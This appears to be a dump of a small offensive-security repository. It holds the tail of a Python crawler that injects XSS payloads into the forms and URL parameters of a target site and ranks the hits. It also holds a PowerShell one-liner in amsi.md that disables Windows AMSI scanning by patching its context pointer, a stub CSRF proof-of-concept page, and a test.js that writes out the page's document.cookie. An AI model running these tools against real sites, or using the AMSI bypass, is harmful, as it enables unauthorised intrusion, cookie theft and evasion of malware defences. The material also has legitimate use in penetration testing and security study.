89 | " / \ \___ \ / \ |_> X <_> ) | | | \ ___/| | \/\n" 90 | " /___/\ \/____ >_______ / __/ \____/|__| |__| \___ >__|\n" 91 | " \_/ \/ \/|__| \/\n" 92 | "|-------------------------------------------------\n" + color.END + "" 93 | "|\n" 94 | "|\033[K Domain or Subdomain to Scan: " + color.BLUE + domain + color.END + "\n" 95 | "|\033[K Status: " + color.GREEN + status + color.END + "\n" 96 | "|\033[K URLs to Test: " + color.GREEN + (str(url_count) if url_count > 0 else "N/A") + color.END + "\n" 97 | "|\033[K Percentage Completed: " + (color.YELLOW if url_count != iteration else color.GREEN) + (("{0:.1f}").format(100 * (iteration / float(url_count))) if iteration >= 0 else "N/A") + color.END + "\n" 98 | "|\033[K Current URL: " + color.BLUE + curr_url + color.END + "\n" 99 | "|\033[K Element: " + color.YELLOW + element + color.END + "\n" 100 | "|\033[K Vulnerabilities Found: " + (color.RED if len(xssLinks) > 0 else color.GREEN) + str(len(xssLinks)) + 
color.END + "\n" 101 | "|\033[K High: " + color.RED + str(len(highProbLinks)) + color.END + "\n" 102 | "|\033[K Medium: " + color.YELLOW + str(len(medProbLinks)) + color.END + "\n" 103 | "|\033[K Low: " + color.GREEN + str(len(lowProbLinks)) + color.END + "\n" 104 | "|\033[K Most Recent Vulnerable Link: " + color.BLUE + (xssLinks[len(xssLinks)-1] if len(xssLinks) >= 1 else "N/A") + color.END +"\n" 105 | "\n" 106 | ) 107 | 108 | # Sort the payload into different categories based on likleyhood of exploit 109 | # override to say that the payload is high probability 110 | def sortPayload(payload, report, override = False): 111 | if payload in payloads[:2] or override: 112 | highProbLinks.append(report) 113 | elif payload == payloads[2]: 114 | lowProbLinks.append(report) 115 | else: 116 | medProbLinks.append(report) 117 | 118 | def testPayload(payload, p, link): 119 | br.form[str(p.name)] = payload 120 | br.submit() 121 | # if payload is found in response, we have XSS 122 | if payload in br.response().read(): 123 | #color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!') 124 | report = 'Link: %s, Payload: %s, Element: %s' % (str(link), 125 | payload, str(p.name)) 126 | # Test for href= and src="javascript:alert()" which is xss, most other links with 127 | # javascript:alert() are not good 128 | if payload == payloads[2]: 129 | srcCheck = "src=\"" + payload + "\"" 130 | hrefCheck = "href=\"" + payload + "\"" 131 | if srcCheck in br.response().read() or hrefCheck in br.response().read(): 132 | sortPayload(payload, report, True) 133 | else: 134 | sortPayload(payload, report) 135 | else: 136 | sortPayload(payload, report) 137 | 138 | 139 | xssLinks.append(report) 140 | br.back() 141 | 142 | def testURL(payload, element, link): 143 | # if payload is found in response, we have XSS 144 | if payload in br.response().read(): 145 | #color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!') 146 | report = 'Link: %s, Payload: %s, Url Element: %s' % (str(link), 147 | 
payload, element) 148 | if payload == payloads[2]: 149 | srcCheck = "src=\"" + payload + "\"" 150 | hrefCheck = "href=\"confirm" + payload + "\"" 151 | if srcCheck in br.response().read() or hrefCheck in br.response().read(): 152 | sortPayload(payload, report, True) 153 | else: 154 | sortPayload(payload, report) 155 | else: 156 | sortPayload(payload, report) 157 | 158 | xssLinks.append(report) 159 | br.back() 160 | 161 | 162 | def initializeAndFind(): 163 | 164 | if not results.url: # if the url has been passed or not 165 | #color.log(logging.INFO, color.GREEN, 'Url not provided correctly') 166 | return [] 167 | 168 | firstDomains = [] # list of domains 169 | allURLS = [] 170 | allURLS.append(results.url) # just one url at the moment 171 | largeNumberOfUrls = [] # in case one wants to do comprehensive search 172 | 173 | # doing a short traversal if no command line argument is being passed 174 | #color.log(logging.INFO, color.GREEN, 'Doing a short traversal.') 175 | interface("Executing Short Traversal", "N/A", "N/A", -1, -1) 176 | for url in allURLS: 177 | smallurl = str(url) 178 | # Test HTTPS/HTTP compatibility. 
Prefers HTTPS but defaults to 179 | # HTTP if any errors are encountered 180 | # Removed the www from the link as that was causing issues with sites 181 | # not being served out of www 182 | # Also allows for the user to search for subdomains as well to be more precise 183 | try: 184 | test = httplib.HTTPSConnection(smallurl) 185 | test.request("GET", "/") 186 | response = test.getresponse() 187 | if (response.status == 200) | (response.status == 302): 188 | url = "https://" + str(url) 189 | elif response.status == 301: 190 | loc = response.getheader('Location') 191 | url = loc.scheme + '://' + loc.netloc 192 | else: 193 | url = "http://" + str(url) 194 | except: 195 | url = "http://" + str(url) 196 | try: 197 | if results.cookies: 198 | br.open(url) 199 | #color.log(logging.INFO, color.BLUE, 200 | # 'Adding cookie: %s' % cookie) 201 | # Attempt to add cookies to the session 202 | with open(results.cookies) as f: 203 | data = json.load(f) 204 | 205 | for cookie in data: 206 | name = cookie['name'] 207 | value = cookie['value'] 208 | br.set_cookie(name + "=" + value + "; expires=Wednesday, 08-Aug-19 10:40:40 GMT;") 209 | 210 | br.open(url) 211 | #color.log(logging.INFO, color.GREEN, 212 | # 'Finding all the links of the website ' + str(url)) 213 | firstDomains.append(str(url)); # add the original link itself 214 | for link in br.links(): # finding the links of the website 215 | if smallurl in str(link.absolute_url): 216 | firstDomains.append(str(link.absolute_url)) 217 | firstDomains = list(set(firstDomains)) 218 | except: 219 | pass 220 | #color.log(logging.INFO, color.GREEN, 221 | # 'Number of links to test are: ' + str(len(firstDomains))) 222 | if results.compOn: 223 | interface("Executing Comprehensive Traversal -- This may take a while", "N/A", "N/A", len(firstDomains), -1) 224 | for link in firstDomains: 225 | try: 226 | br.open(link) 227 | # going deeper into each link and finding its links 228 | for newlink in br.links(): 229 | if smallurl in 
str(newlink.absolute_url): 230 | largeNumberOfUrls.append(newlink.absolute_url) 231 | except: 232 | pass 233 | firstDomains = list(set(firstDomains + largeNumberOfUrls)) 234 | #color.log(logging.INFO, color.GREEN, 235 | # 'Total Number of links to test have become: ' + 236 | # str(len(firstDomains))) # all links have been found 237 | 238 | return firstDomains 239 | 240 | # Removes links that are similar but have different variable values 241 | # ex: https://a.com?value=55 and https://a.com?value=77 242 | # Useless to test both as they will produce similar results 243 | def trimLinks(firstDomains): 244 | interface("Removing duplicate urls", "N/A", "N/A", len(firstDomains), -1) 245 | polishedLinks = set() 246 | trimmedLinks = [] 247 | 248 | for url in firstDomains: 249 | if '?' in str(url): 250 | polishedUrl = url 251 | query = str(url).split("?")[1] #Get the arguments 252 | elements = query.split('&') #Split by each argument 253 | for element in elements: 254 | polishedElement = element.split('=')[0] 255 | polishedUrl = polishedUrl.replace(element, polishedElement + '=xxx') #Replace each argument value 256 | #with a constant 257 | lenBefore = len(polishedLinks) #Check the length before adding to set 258 | polishedLinks.add(polishedUrl) #Add the polished url to the set 259 | if lenBefore != len(polishedLinks): #If length of set does not go up we know that the link is duplicate 260 | trimmedLinks.append(url) 261 | elif '#' in str(url): 262 | polishedUrl = url 263 | query = str(url).split("#")[1] #Repeat code because functions are not as fun as a shit load of code 264 | polishedUrl = polishedUrl.replace(query,"xxx") 265 | 266 | lenBefore = len(polishedLinks) 267 | polishedLinks.add(url) 268 | if lenBefore != len(polishedLinks): 269 | trimmedLinks.append(url) 270 | else: 271 | lenBefore = len(polishedLinks) 272 | polishedLinks.add(url) 273 | if lenBefore != len(polishedLinks): 274 | trimmedLinks.append(url) 275 | trimmedLinks = list(trimmedLinks) 276 | return 
trimmedLinks 277 | 278 | def listVulnLinks(): 279 | if len(xssLinks) > 0: 280 | sys.stdout.flush() 281 | # print all xss findings 282 | if len(highProbLinks) > 0: 283 | sys.stdout.write(color.RED + color.BOLD + 'The following links have high probability of exploit:' + color.END + '\n') 284 | for link in highProbLinks: 285 | sys.stdout.write(color.RED + ' ' + link + color.END + "\n") 286 | 287 | if len(medProbLinks) > 0: 288 | sys.stdout.write(color.YELLOW + color.BOLD + 'The following links have medium probability of exploit:' + color.END + '\n') 289 | for link in medProbLinks: 290 | sys.stdout.write(color.YELLOW + ' ' + link + color.END + "\n") 291 | 292 | if len(lowProbLinks) > 0: 293 | sys.stdout.write(color.GREEN + color.BOLD + 'The following links have low probability of exploit:' + color.END + '\n') 294 | for link in lowProbLinks: 295 | sys.stdout.write(color.GREEN + ' ' + link + color.END + "\n") 296 | else: 297 | sys.stdout.flush() 298 | sys.stdout.write(color.YELLOW + 'No vulnerable links detected' + color.END + "\n") 299 | 300 | def findxss(firstDomains): 301 | # starting finding XSS 302 | interface("Started Finding XSS", "N/A", "N/A", len(firstDomains), -1) 303 | #color.log(logging.INFO, color.GREEN, 'Started finding XSS') 304 | if firstDomains: # if there is atleast one link 305 | count = 0 # Keep track of what url we are on 306 | for link in firstDomains: 307 | interface("Started Finding XSS", str(link), "N/A", len(firstDomains), count) 308 | count += 1 309 | blacklisted = False 310 | y = str(link) 311 | #color.log(logging.DEBUG, color.YELLOW, str(link)) 312 | for ext in blacklist: 313 | if ext in y: 314 | blacklisted = True 315 | break 316 | if not blacklisted: 317 | try: # Section to change to also test in url and not just forms 318 | # Currently we miss a large portion of vulnerabilites -- xss-game only gets first level 319 | # Apparently it cant recognize the form tag 320 | br.open(str(link)) # open the link 321 | if br.forms(): # if a form exists, 
submit it 322 | for form_num in range(0,len(br.forms())): # Added so that we explore all forms not just the first one 323 | params = list(br.forms())[form_num] # our form 324 | br.select_form(nr=form_num) # submit the first form 325 | for p in params.controls: 326 | par = str(p) 327 | # submit only those forms which require text 328 | if 'TextControl' in par: 329 | interface("Started Finding XSS", str(link), str(p.name), len(firstDomains), count) 330 | #color.log(logging.DEBUG, color.YELLOW, 331 | # '\tParam: ' + str(p.name)) 332 | for item in payloads: 333 | testPayload(item, p, link) 334 | except: 335 | pass 336 | # Test for xss in the url only if the flag specifies it 337 | if results.url_check: 338 | try: 339 | # Custom script to test xss in url that is not a form 340 | # Check that the element name is not p.name since that was 341 | # a form that we already tested 342 | if '?' in str(link): #If the link has ? then we know the possiblility of input being placed in dom is good 343 | url_args = str(link).split("?")[1] 344 | elements = url_args.split("&") 345 | for assignment in elements: # Get each element and test it for xss 346 | expression = assignment.split("=") 347 | if len(expression) < 2: 348 | continue 349 | # Get the element and value 350 | element = expression[0] 351 | value = expression[1] 352 | interface("Started Finding XSS", str(link), element, len(firstDomains), count) 353 | # Test out all of our payloads by appending them to the original value 354 | for item in range(0,len(urlpayloads)): 355 | if item == urlpayloads[2]: #Javascript:alert() needs to be on its own since it can only be used by itself 356 | br.open(str(link).replace(assignment, element + '=' + urlpayloads[item])) 357 | else: 358 | br.open(str(link).replace(assignment, element + '=' + value + urlpayloads[item])) 359 | testURL(payloads[item], element, link) 360 | 361 | # Custom build to check for values after # 362 | if '#' in str(link): 363 | for item in range(0,len(urlpayloads)): 364 
| interface("Started Finding XSS", str(link), "#", len(firstDomains), count) 365 | br.open(str(link) + urlpayloads[item]) 366 | testURL(payloads[item], "#", link) 367 | except: 368 | pass 369 | 370 | interface("Finished Finding XSS", "N/A", "N/A", len(firstDomains), len(firstDomains)) 371 | listVulnLinks() 372 | else: 373 | sys.stdout.flush() 374 | sys.stdout.write(color.RED + color.BOLD + 'No link found, exiting' + color.END + "\n") 375 | 376 | 377 | # calling the function 378 | firstDomains = trimLinks(initializeAndFind()) 379 | #firstDomains = initializeAndFind() 380 | findxss(firstDomains) 381 | -------------------------------------------------------------------------------- /amsi.md: -------------------------------------------------------------------------------- 1 | ``` 2 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); 3 | ``` 4 | -------------------------------------------------------------------------------- /json_CSRF.html: -------------------------------------------------------------------------------- 1 | 2 | JSON CSRF Exploit POC 3 | 4 | 5 |
6 |

JSON CSRF Exploit POC

7 | 8 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /test.js: -------------------------------------------------------------------------------- 1 | var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self._wb_wombat.local_init && self._wb_wombat.local_init(name)) || self[name]; }; 2 | if (!self.__WB_pmw) { self.__WB_pmw = function(obj) { this.__WB_source = obj; return this; } } 3 | { 4 | let window = _____WB$wombat$assign$function_____("window"); 5 | let self = _____WB$wombat$assign$function_____("self"); 6 | let document = _____WB$wombat$assign$function_____("document"); 7 | let location = _____WB$wombat$assign$function_____("location"); 8 | let top = _____WB$wombat$assign$function_____("top"); 9 | let parent = _____WB$wombat$assign$function_____("parent"); 10 | let frames = _____WB$wombat$assign$function_____("frames"); 11 | let opener = _____WB$wombat$assign$function_____("opener"); 12 | 13 | document.write ("This is remote text via xss.js located at ha.ckers.org " + document.cookie); 14 | alert ("This is remote text via xss.js located at ha.ckers.org " + document.cookie); 15 | 16 | 17 | } 18 | --------------------------------------------------------------------------------